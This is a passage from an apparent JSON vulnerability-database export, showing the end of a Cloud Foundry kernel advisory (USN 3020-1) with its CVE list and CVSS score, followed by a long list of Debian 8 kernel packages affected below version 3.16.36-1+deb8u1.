Credit\n\nJesse Hertz, Tim Newsham, Baozeng Ding and Kangjie Lu\n\n# References\n\n * <http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-8159.html>\n * <https://bosh.io/stemcells>\n * <https://github.com/cloudfoundry/cf-release>\n", "edition": 4, "reporter": "Cloud Foundry", "published": "2016-07-01T00:00:00", "title": "USN 3020-1 Linux kernel (Vivid HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2016-4913", "CVE-2016-4951", "CVE-2014-8159", "CVE-2016-4569", "CVE-2016-4997", "CVE-2016-4482", "CVE-2016-4578", "CVE-2016-4580", "CVE-2016-4998"], "modified": "2016-07-01T00:00:00", "id": "CFOUNDRY:96E3A8B8A251E08132E367B0C5BCD522", "href": "https://www.cloudfoundry.org/blog/usn-3020-1/", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-10-16T22:13:31", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-support-3.16.0-6_3.16.36-1+deb8u1_all.deb", "packageName": "linux-support-3.16.0-6", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-libc-dev_3.16.36-1+deb8u1_all.deb", "packageName": "linux-libc-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux_3.16.36-1+deb8u1_all.deb", "packageName": "linux", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-armmp_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-7-armmp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-all-amd64_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-4-all-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-compiler-gcc-4.8-arm_3.16.36-1+deb8u1_all.deb", "packageName": "linux-compiler-gcc-4.8-arm", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-source-3.16_3.16.36-1+deb8u1_all.deb", "packageName": "linux-source-3.16", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-all_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-4-all", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-4-686-pae-dbg_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-4-686-pae-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-all-i386_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-5-all-i386", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-orion5x_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-5-orion5x", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-6-kirkwood_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-6-kirkwood", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-orion5x_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-6-orion5x", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "xen-linux-system-3.16.0-6-amd64_3.16.36-1+deb8u1_all.deb", "packageName": "xen-linux-system-3.16.0-6-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-ixp4xx_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-6-ixp4xx", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-686-pae_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-5-686-pae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-armmp_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-5-armmp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-amd64_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-7-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-amd64_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-5-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-kirkwood_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-4-kirkwood", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-kirkwood_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-7-kirkwood", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-all-armhf_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-6-all-armhf", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-compiler-gcc-4.9-x86_3.16.36-1+deb8u1_all.deb", "packageName": "linux-compiler-gcc-4.9-x86", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-6-orion5x_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-6-orion5x", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-all-armel_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-5-all-armel", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-6-686-pae-dbg_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-6-686-pae-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-6-686-pae_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-6-686-pae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-all-i386_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-6-all-i386", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-all_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-7-all", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-686-pae_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-7-686-pae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-all-armhf_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-4-all-armhf", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-6-armmp-lpae_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-6-armmp-lpae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-orion5x_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-7-orion5x", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-7-kirkwood_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-7-kirkwood", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-orion5x_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-4-orion5x", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-armmp_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-4-armmp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-all-amd64_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-5-all-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-all-armhf_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-7-all-armhf", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-7-586_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-7-586", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-5-orion5x_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-5-orion5x", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-4-orion5x_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-4-orion5x", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-all-i386_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-4-all-i386", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-ixp4xx_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-7-ixp4xx", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-all-amd64_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-6-all-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "xen-linux-system-3.16.0-4-amd64_3.16.36-1+deb8u1_all.deb", "packageName": "xen-linux-system-3.16.0-4-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-all_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-5-all", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-armmp-lpae_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-6-armmp-lpae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-6-amd64-dbg_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-6-amd64-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-amd64_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-4-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-kirkwood_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-5-kirkwood", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-686-pae_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-6-686-pae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-manual-3.16_3.16.36-1+deb8u1_all.deb", "packageName": "linux-manual-3.16", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-7-amd64_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-7-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-5-ixp4xx_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-5-ixp4xx", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-versatile_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-5-versatile", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-ixp4xx_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-5-ixp4xx", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-7-686-pae_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-7-686-pae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-4-586_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-4-586", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-6-586_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-6-586", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-4-armmp-lpae_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-4-armmp-lpae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-5-686-pae-dbg_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-5-686-pae-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-versatile_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-4-versatile", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-all-armel_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-4-all-armel", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "xen-linux-system-3.16.0-7-amd64_3.16.36-1+deb8u1_all.deb", "packageName": "xen-linux-system-3.16.0-7-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-versatile_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-7-versatile", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-ixp4xx_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-4-ixp4xx", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-common_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-7-common", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-armmp_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-6-armmp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-5-amd64_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-5-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-4-armmp_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-4-armmp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-7-amd64-dbg_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-7-amd64-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-6-armmp_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-6-armmp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-support-3.16.0-7_3.16.36-1+deb8u1_all.deb", "packageName": "linux-support-3.16.0-7", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-common_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-4-common", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-kirkwood_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-6-kirkwood", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-5-kirkwood_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-5-kirkwood", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-armmp-lpae_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-4-armmp-lpae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-6-ixp4xx_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-6-ixp4xx", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-amd64_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-6-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-4-amd64_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-4-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-7-orion5x_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-7-orion5x", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-all-i386_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-7-all-i386", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-common_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-6-common", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-versatile_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-6-versatile", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-armmp-lpae_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-5-armmp-lpae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-7-686-pae-dbg_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-7-686-pae-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-5-586_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-5-586", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-4-kirkwood_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-4-kirkwood", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-7-versatile_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-7-versatile", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-5-armmp-lpae_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-5-armmp-lpae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "xen-linux-system-3.16.0-5-amd64_3.16.36-1+deb8u1_all.deb", "packageName": "xen-linux-system-3.16.0-5-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-586_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-5-586", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-all-armel_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-7-all-armel", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-all-armel_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-6-all-armel", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-support-3.16.0-4_3.16.36-1+deb8u1_all.deb", "packageName": "linux-support-3.16.0-4", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-compiler-gcc-4.8-x86_3.16.36-1+deb8u1_all.deb", "packageName": "linux-compiler-gcc-4.8-x86", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-4-686-pae_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-4-686-pae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-doc-3.16_3.16.36-1+deb8u1_all.deb", "packageName": "linux-doc-3.16", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-5-686-pae_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-5-686-pae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-5-armmp_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-5-armmp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-4-ixp4xx_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-4-ixp4xx", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-all-armhf_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-5-all-armhf", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-586_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-4-586", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-7-armmp_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-7-armmp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-all-amd64_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-7-all-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-4-versatile_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-4-versatile", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-586_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-6-586", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-5-versatile_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-5-versatile", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-4-amd64-dbg_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-4-amd64-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-common_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-5-common", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-6-versatile_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-6-versatile", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-586_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-7-586", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": 